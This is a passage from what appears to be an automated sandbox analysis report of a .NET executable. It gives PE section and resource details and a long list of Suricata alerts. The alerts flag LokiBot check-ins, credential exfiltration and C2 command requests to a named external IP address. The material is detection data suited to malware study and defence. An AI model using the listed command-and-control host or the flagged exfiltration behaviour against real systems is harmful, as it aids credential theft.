IMAGE_DIRECTORY_ENTRY_RESOURCE	0x94000	0x1d7c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x96000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x906ec	0x90800	d9d07ddc2146889bed0094cb505c9d7b	False	0.948473656466263	data	7.9227520273220895	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x94000	0x1d7c	0x1e00	189959de2daf17a1a19aa0679201b63f	False	0.80625	data	7.321945731144507	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x96000	0xc	0x200	6d98c7473e47d9fd8de69fea995f2518	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x94100	0x1733	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9151372284896447
RT_GROUP_ICON	0x95844	0x14	data	1.05
RT_VERSION	0x95868	0x314	data	0.43274111675126903
RT_MANIFEST	0x95b8c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-22T17:38:18.696905+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50000	TCP
2024-11-22T17:38:20.385794+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49733	94.156.177.41	80	TCP
2024-11-22T17:38:20.385794+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49733	94.156.177.41	80	TCP
2024-11-22T17:38:20.385794+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49733	94.156.177.41	80	TCP
2024-11-22T17:38:21.673105+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49733	94.156.177.41	80	TCP
2024-11-22T17:38:22.053197+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49735	94.156.177.41	80	TCP
2024-11-22T17:38:22.053197+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49735	94.156.177.41	80	TCP
2024-11-22T17:38:22.053197+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49735	94.156.177.41	80	TCP
2024-11-22T17:38:23.332524+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49735	94.156.177.41	80	TCP
2024-11-22T17:38:23.667763+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49736	94.156.177.41	80	TCP
2024-11-22T17:38:23.667763+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49736	94.156.177.41	80	TCP
2024-11-22T17:38:23.667763+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49736	94.156.177.41	80	TCP
2024-11-22T17:38:24.937744+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49736	94.156.177.41	80	TCP
2024-11-22T17:38:24.937744+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49736	94.156.177.41	80	TCP
2024-11-22T17:38:25.060056+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49736	TCP
2024-11-22T17:38:25.419739+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49738	94.156.177.41	80	TCP
2024-11-22T17:38:25.419739+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49738	94.156.177.41	80	TCP
2024-11-22T17:38:25.419739+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49738	94.156.177.41	80	TCP
2024-11-22T17:38:26.773102+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49738	94.156.177.41	80	TCP
2024-11-22T17:38:26.773102+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49738	94.156.177.41	80	TCP
2024-11-22T17:38:26.901213+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49738	TCP
2024-11-22T17:38:27.183872+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49739	94.156.177.41	80	TCP
2024-11-22T17:38:27.183872+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49739	94.156.177.41	80	TCP
2024-11-22T17:38:27.183872+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49739	94.156.177.41	80	TCP
2024-11-22T17:38:28.639683+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49739	94.156.177.41	80	TCP
2024-11-22T17:38:28.639683+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49739	94.156.177.41	80	TCP
2024-11-22T17:38:28.759253+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49739	TCP
2024-11-22T17:38:29.035149+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49740	94.156.177.41	80	TCP
2024-11-22T17:38:29.035149+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49740	94.156.177.41	80	TCP
2024-11-22T17:38:29.035149+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49740	94.156.177.41	80	TCP
2024-11-22T17:38:30.444496+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49740	94.156.177.41	80	TCP
2024-11-22T17:38:30.444496+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49740	94.156.177.41	80	TCP
2024-11-22T17:38:30.564948+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49740	TCP
2024-11-22T17:38:30.844447+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49741	94.156.177.41	80	TCP
2024-11-22T17:38:30.844447+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49741	94.156.177.41	80	TCP
2024-11-22T17:38:30.844447+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49741	94.156.177.41	80	TCP
2024-11-22T17:38:32.251170+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49741	94.156.177.41	80	TCP
2024-11-22T17:38:32.251170+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49741	94.156.177.41	80	TCP
2024-11-22T17:38:32.375028+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49741	TCP
2024-11-22T17:38:32.663838+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49743	94.156.177.41	80	TCP
2024-11-22T17:38:32.663838+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49743	94.156.177.41	80	TCP
2024-11-22T17:38:32.663838+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49743	94.156.177.41	80	TCP
2024-11-22T17:38:33.940877+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49743	94.156.177.41	80	TCP
2024-11-22T17:38:33.940877+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49743	94.156.177.41	80	TCP
2024-11-22T17:38:34.060918+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49743	TCP
2024-11-22T17:38:34.331046+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49745	94.156.177.41	80	TCP
2024-11-22T17:38:34.331046+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49745	94.156.177.41	80	TCP
2024-11-22T17:38:34.331046+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49745	94.156.177.41	80	TCP
2024-11-22T17:38:35.739391+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49745	94.156.177.41	80	TCP
2024-11-22T17:38:35.739391+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49745	94.156.177.41	80	TCP
2024-11-22T17:38:35.862948+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49745	TCP
2024-11-22T17:38:36.401062+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49748	94.156.177.41	80	TCP
2024-11-22T17:38:36.401062+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49748	94.156.177.41	80	TCP
2024-11-22T17:38:36.401062+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49748	94.156.177.41	80	TCP
2024-11-22T17:38:37.721603+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49748	94.156.177.41	80	TCP
2024-11-22T17:38:37.721603+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49748	94.156.177.41	80	TCP
2024-11-22T17:38:37.847124+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49748	TCP
2024-11-22T17:38:38.111286+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49749	94.156.177.41	80	TCP
2024-11-22T17:38:38.111286+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49749	94.156.177.41	80	TCP
2024-11-22T17:38:38.111286+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49749	94.156.177.41	80	TCP
2024-11-22T17:38:39.565166+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49749	94.156.177.41	80	TCP
2024-11-22T17:38:39.565166+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49749	94.156.177.41	80	TCP
2024-11-22T17:38:39.689057+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49749	TCP
2024-11-22T17:38:39.948025+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49751	94.156.177.41	80	TCP
2024-11-22T17:38:39.948025+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49751	94.156.177.41	80	TCP
2024-11-22T17:38:39.948025+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49751	94.156.177.41	80	TCP
2024-11-22T17:38:41.267831+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49751	94.156.177.41	80	TCP
2024-11-22T17:38:41.267831+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49751	94.156.177.41	80	TCP
2024-11-22T17:38:41.388207+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49751	TCP
2024-11-22T17:38:41.659082+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49753	94.156.177.41	80	TCP
2024-11-22T17:38:41.659082+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49753	94.156.177.41	80	TCP
2024-11-22T17:38:41.659082+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49753	94.156.177.41	80	TCP
2024-11-22T17:38:43.017979+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49753	94.156.177.41	80	TCP
2024-11-22T17:38:43.017979+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49753	94.156.177.41	80	TCP
2024-11-22T17:38:43.138286+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49753	TCP
2024-11-22T17:38:43.413430+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49754	94.156.177.41	80	TCP
2024-11-22T17:38:43.413430+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49754	94.156.177.41	80	TCP
2024-11-22T17:38:43.413430+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49754	94.156.177.41	80	TCP
2024-11-22T17:38:44.821525+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49754	94.156.177.41	80	TCP
2024-11-22T17:38:44.821525+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49754	94.156.177.41	80	TCP
2024-11-22T17:38:44.941143+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49754	TCP
2024-11-22T17:38:45.199702+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49755	94.156.177.41	80	TCP
2024-11-22T17:38:45.199702+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49755	94.156.177.41	80	TCP
2024-11-22T17:38:45.199702+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49755	94.156.177.41	80	TCP
2024-11-22T17:38:46.587354+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49755	94.156.177.41	80	TCP
2024-11-22T17:38:46.587354+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49755	94.156.177.41	80	TCP
2024-11-22T17:38:46.707141+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49755	TCP
2024-11-22T17:38:46.970645+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49756	94.156.177.41	80	TCP
2024-11-22T17:38:46.970645+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49756	94.156.177.41	80	TCP
2024-11-22T17:38:46.970645+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49756	94.156.177.41	80	TCP
2024-11-22T17:38:48.298382+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49756	94.156.177.41	80	TCP
2024-11-22T17:38:48.298382+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49756	94.156.177.41	80	TCP
2024-11-22T17:38:48.418123+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49756	TCP
2024-11-22T17:38:48.693877+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49757	94.156.177.41	80	TCP
2024-11-22T17:38:48.693877+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49757	94.156.177.41	80	TCP
2024-11-22T17:38:48.693877+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49757	94.156.177.41	80	TCP
2024-11-22T17:38:50.103232+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49757	94.156.177.41	80	TCP
2024-11-22T17:38:50.103232+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49757	94.156.177.41	80	TCP
2024-11-22T17:38:50.222754+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49757	TCP
2024-11-22T17:38:50.493985+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49758	94.156.177.41	80	TCP
2024-11-22T17:38:50.493985+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49758	94.156.177.41	80	TCP
2024-11-22T17:38:50.493985+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49758	94.156.177.41	80	TCP
2024-11-22T17:38:51.916181+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49758	94.156.177.41	80	TCP
2024-11-22T17:38:51.916181+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49758	94.156.177.41	80	TCP
2024-11-22T17:38:52.042226+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49758	TCP
2024-11-22T17:38:52.309427+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49759	94.156.177.41	80	TCP
2024-11-22T17:38:52.309427+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49759	94.156.177.41	80	TCP
2024-11-22T17:38:52.309427+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49759	94.156.177.41	80	TCP
2024-11-22T17:38:53.761108+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49759	94.156.177.41	80	TCP
2024-11-22T17:38:53.761108+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49759	94.156.177.41	80	TCP
2024-11-22T17:38:53.883990+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49759	TCP
2024-11-22T17:38:54.159922+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49760	94.156.177.41	80	TCP
2024-11-22T17:38:54.159922+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49760	94.156.177.41	80	TCP
2024-11-22T17:38:54.159922+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49760	94.156.177.41	80	TCP
2024-11-22T17:38:55.610382+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49760	94.156.177.41	80	TCP
2024-11-22T17:38:55.610382+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49760	94.156.177.41	80	TCP
2024-11-22T17:38:55.733469+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49760	TCP
2024-11-22T17:38:56.007119+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49762	94.156.177.41	80	TCP
2024-11-22T17:38:56.007119+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49762	94.156.177.41	80	TCP
2024-11-22T17:38:56.007119+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49762	94.156.177.41	80	TCP
2024-11-22T17:38:57.457422+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49762	94.156.177.41	80	TCP
2024-11-22T17:38:57.457422+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49762	94.156.177.41	80	TCP
2024-11-22T17:38:57.577179+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49762	TCP
2024-11-22T17:38:57.847693+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49768	94.156.177.41	80	TCP
2024-11-22T17:38:57.847693+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49768	94.156.177.41	80	TCP
2024-11-22T17:38:57.847693+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49768	94.156.177.41	80	TCP
2024-11-22T17:38:59.302710+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49768	94.156.177.41	80	TCP
2024-11-22T17:38:59.302710+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49768	94.156.177.41	80	TCP
2024-11-22T17:38:59.426546+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49768	TCP
2024-11-22T17:38:59.730255+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49769	94.156.177.41	80	TCP
2024-11-22T17:38:59.730255+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49769	94.156.177.41	80	TCP
2024-11-22T17:38:59.730255+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49769	94.156.177.41	80	TCP
2024-11-22T17:39:01.010755+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49769	94.156.177.41	80	TCP
2024-11-22T17:39:01.010755+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49769	94.156.177.41	80	TCP
2024-11-22T17:39:01.131407+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49769	TCP
2024-11-22T17:39:01.391645+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49775	94.156.177.41	80	TCP
2024-11-22T17:39:01.391645+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49775	94.156.177.41	80	TCP
2024-11-22T17:39:01.391645+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49775	94.156.177.41	80	TCP
2024-11-22T17:39:02.801173+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49775	94.156.177.41	80	TCP
2024-11-22T17:39:02.801173+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49775	94.156.177.41	80	TCP
2024-11-22T17:39:02.920927+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49775	TCP
2024-11-22T17:39:03.187495+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49781	94.156.177.41	80	TCP
2024-11-22T17:39:03.187495+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49781	94.156.177.41	80	TCP
2024-11-22T17:39:03.187495+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49781	94.156.177.41	80	TCP
2024-11-22T17:39:04.480951+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49781	94.156.177.41	80	TCP
2024-11-22T17:39:04.480951+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49781	94.156.177.41	80	TCP
2024-11-22T17:39:04.600571+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49781	TCP
2024-11-22T17:39:04.874345+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49787	94.156.177.41	80	TCP
2024-11-22T17:39:04.874345+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49787	94.156.177.41	80	TCP
2024-11-22T17:39:04.874345+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49787	94.156.177.41	80	TCP
2024-11-22T17:39:06.235877+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49787	94.156.177.41	80	TCP
2024-11-22T17:39:06.235877+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49787	94.156.177.41	80	TCP
2024-11-22T17:39:06.355478+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49787	TCP
2024-11-22T17:39:06.624697+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49788	94.156.177.41	80	TCP
2024-11-22T17:39:06.624697+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49788	94.156.177.41	80	TCP
2024-11-22T17:39:06.624697+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49788	94.156.177.41	80	TCP
2024-11-22T17:39:07.860411+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49788	94.156.177.41	80	TCP
2024-11-22T17:39:07.860411+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49788	94.156.177.41	80	TCP
2024-11-22T17:39:07.980188+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49788	TCP
2024-11-22T17:39:08.251882+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49794	94.156.177.41	80	TCP
2024-11-22T17:39:08.251882+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49794	94.156.177.41	80	TCP
2024-11-22T17:39:08.251882+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49794	94.156.177.41	80	TCP
2024-11-22T17:39:09.682146+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49794	94.156.177.41	80	TCP
2024-11-22T17:39:09.682146+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49794	94.156.177.41	80	TCP
2024-11-22T17:39:09.802909+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49794	TCP
2024-11-22T17:39:10.075035+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49800	94.156.177.41	80	TCP
2024-11-22T17:39:10.075035+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49800	94.156.177.41	80	TCP
2024-11-22T17:39:10.075035+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49800	94.156.177.41	80	TCP
2024-11-22T17:39:11.305204+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49800	94.156.177.41	80	TCP
2024-11-22T17:39:11.305204+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49800	94.156.177.41	80	TCP
2024-11-22T17:39:11.424821+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49800	TCP
2024-11-22T17:39:11.694205+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49806	94.156.177.41	80	TCP
2024-11-22T17:39:11.694205+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49806	94.156.177.41	80	TCP
2024-11-22T17:39:11.694205+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49806	94.156.177.41	80	TCP
2024-11-22T17:39:13.054807+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49806	94.156.177.41	80	TCP
2024-11-22T17:39:13.054807+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49806	94.156.177.41	80	TCP
2024-11-22T17:39:13.174861+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49806	TCP
2024-11-22T17:39:13.452854+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49807	94.156.177.41	80	TCP
2024-11-22T17:39:13.452854+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49807	94.156.177.41	80	TCP
2024-11-22T17:39:13.452854+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49807	94.156.177.41	80	TCP
2024-11-22T17:39:14.727841+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49807	94.156.177.41	80	TCP
2024-11-22T17:39:14.727841+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49807	94.156.177.41	80	TCP
2024-11-22T17:39:14.848103+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49807	TCP
2024-11-22T17:39:15.106129+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49814	94.156.177.41	80	TCP
2024-11-22T17:39:15.106129+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49814	94.156.177.41	80	TCP
2024-11-22T17:39:15.106129+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49814	94.156.177.41	80	TCP
